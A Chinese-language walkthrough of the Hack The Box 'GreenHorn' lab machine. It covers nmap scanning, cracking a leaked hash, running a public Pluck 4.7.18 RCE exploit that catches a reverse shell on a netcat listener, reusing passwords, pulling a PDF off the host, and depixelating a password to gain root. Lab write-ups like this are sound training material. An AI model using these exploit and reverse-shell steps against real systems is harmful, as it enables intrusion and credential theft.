HackTheBox-Machines GreenHorn Writeup

Exploitation

首先一樣用 nmap 看一下他有開哪些服務：

└──╼ [★]$ nmap -sV 10.10.11.25
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 02:36 CDT
Nmap scan report for 10.10.11.25
Host is up (0.0024s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
3000/tcp open  ppp?

有 22, 80, 3000 port，那看起來應該有網頁：
他會自動 redirect 到 http://greenhorn.htb，所以我們可以把它加到 /etc/hosts：

└──╼ [★]$ sudo echo "10.10.11.25 greenhorn.htb" | sudo tee -a /etc/hosts
10.10.11.25 greenhorn.htb

連上網站後逛一圈會發現首頁底下有個 admin 的按鈕點進去會看到：

上網查一下 pluck 是什麼：

Pluck is your small and simple content management system, written in php. With pluck, you can easily manage your own website without knowledge of programming languages. Pluck focuses on ease of use and enables everyone to manage his own website. This makes pluck an excellent choice for every small website.
看起來是一個用 php 寫的框架，讓人方便管理網站的。
同時截圖左邊可以看到 pluck 4.7.18 的小字，那上網查會發現這是有漏洞的版本，研究了他的利用手法後，我們會發現他有一個上傳漏洞，但目前我們可能要先想辦法登入他，那一開始 nmap 還有掃到 3000 port 有開服務，用瀏覽器存取後會發現是一個自架的 git server，在可能的路徑翻找一下會看到：

我們可以透過線上工具去嘗試破解這串密文：
https://crackstation.net/

找到密碼：iloveyou1 -> 登入 pluck
上網找到一個很方便的腳本：
https://github.com/b0ySie7e/Pluck_Cms_4.7.18_RCE_Exploit
照著 README.md 的教學使用：

└──╼ [★]$ python exploit_pluckv4.7.18_RCE.py -h
usage: exploit_pluckv4.7.18_RCE.py [-h] --password PASSWORD [--filename FILENAME] --ip IP --port PORT --host HOST

Script para crear y subir un archivo ZIP malicioso.

options:
  -h, --help           show this help message and exit
  --password PASSWORD  Password para login
  --filename FILENAME  Nombre del archivo PHP a crear
  --ip IP              IP del atacante
  --port PORT          Puerto del atacante
  --host HOST          URL del host objetivo
┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-m9chba7pro]─[~/Pluck_Cms_4.7.18_RCE_Exploit]
└──╼ [★]$ python exploit_pluckv4.7.18_RCE.py  --password iloveyou1 --ip 10.10.14.22 --port 4444 --host http://greenhorn.htb
[+] Creating payload
[+] Overwriting .php file
[+] Creating ZIP file
Login successful
[+] ZIP file uploaded successfully

Reverse shell:

└──╼ [★]$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.11.25] 48094
bash: cannot set terminal process group (1099): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/mirabbas$

拿到 reverse shell 之後我們可以用 python3 -c 'import pty;pty.spawn("/bin/bash")'開 bash 讓使用體驗更好，接著逛一下思考要怎麼提權：

www-data@greenhorn:/home/junior$ pwd
pwd
/home/junior
www-data@greenhorn:/home/junior$ ls -al
ls -al
total 76
drwxr-xr-x 3 junior junior  4096 Jun 20 06:36  .
drwxr-xr-x 4 root   root    4096 Jun 20 06:36  ..
lrwxrwxrwx 1 junior junior     9 Jun 11 14:38  .bash_history -> /dev/null
drwx------ 2 junior junior  4096 Jun 20 06:36  .cache
-rw-r----- 1 root   junior 61367 Jun 11 14:39 'Using OpenVAS.pdf'
-rw-r----- 1 root   junior    33 Aug  6 13:30  user.txt
www-data@greenhorn:/home/junior$ su junior 
su junior 
Password: iloveyou1

junior@greenhorn:~$ 

找到 user.txt 跟一個酷東西，但擁有者都是 junior，嘗試切換身份結果密碼跟剛剛一樣 XD
嘗試把那份 pdf 載下來看一下，順便把他換個好打的名字：

junior@greenhorn:~$ mv 'Using OpenVAS.pdf' a.pdf               
mv 'Using OpenVAS.pdf' a.pdf
junior@greenhorn:~$ ls
ls
a.pdf  user.txt
junior@greenhorn:~$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

└──╼ [★]$ wget http://10.10.11.25:8000/a.pdf
--2024-08-11 03:34:04--  http://10.10.11.25:8000/a.pdf
Connecting to 10.10.11.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 61367 (60K) [application/pdf]
Saving to: ‘a.pdf’

a.pdf                               100%[=================================================================>]  59.93K  --.-KB/s    in 0.004s  

2024-08-11 03:34:04 (14.1 MB/s) - ‘a.pdf’ saved [61367/61367]

打開 pdf 後會看到一串被打馬賽克的英文，我們可以用 Depix 這個工具來處理馬賽克：
https://github.com/spipm/Depix
那首先我們要把馬賽克的部分切出來，然後轉成 png，pdfimages 可以幫我做到這件事：

└──╼ [★]$ pdfimages -png a.pdf b.png
┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-m9chba7pro]─[~/Desktop]
└──╼ [★]$ ls
a.pdf  b.png-000.png  htb_vpn_logs.log  my_credentials.txt  my_data  README.license

接著把圖片餵給 Depix：

└──╼ [★]$ python3 depix.py \
    -p ~/Desktop/b.png-000.png \
    -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png \
    -o ./output.png
2024-08-11 04:07:08,652 - Loading pixelated image from /home/kazma/Desktop/b.png-000.png
2024-08-11 04:07:08,667 - Loading search image from images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-08-11 04:07:09,174 - Finding color rectangles from pixelated space
2024-08-11 04:07:09,175 - Found 252 same color rectangles
2024-08-11 04:07:09,175 - 190 rectangles left after moot filter
2024-08-11 04:07:09,175 - Found 1 different rectangle sizes
2024-08-11 04:07:09,175 - Finding matches in search image
2024-08-11 04:07:09,175 - Scanning 190 blocks with size (5, 5)
2024-08-11 04:07:09,200 - Scanning in searchImage: 0/1674
2024-08-11 04:07:49,084 - Removing blocks with no matches
2024-08-11 04:07:49,084 - Splitting single matches and multiple matches
2024-08-11 04:07:49,088 - [16 straight matches | 174 multiple matches]
2024-08-11 04:07:49,088 - Trying geometrical matches on single-match squares
2024-08-11 04:07:49,367 - [29 straight matches | 161 multiple matches]
2024-08-11 04:07:49,367 - Trying another pass on geometrical matches
2024-08-11 04:07:49,607 - [41 straight matches | 149 multiple matches]
2024-08-11 04:07:49,607 - Writing single match results to output
2024-08-11 04:07:49,608 - Writing average results for multiple matches to output
2024-08-11 04:07:52,646 - Saving output image to: ./output.png

看一下結果：

得到密碼是：sidefromsidetheothersidesidefromsidetheotherside
馬上丟進去試試看：

www-data@greenhorn:/$ su root
su root
Password: sidefromsidetheothersidesidefromsidetheotherside

root@greenhorn:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@greenhorn:/# find / -name 'root.txt' 2>/dev/null
find / -name 'root.txt' 2>/dev/null
/root/root.txt

Pwned !!!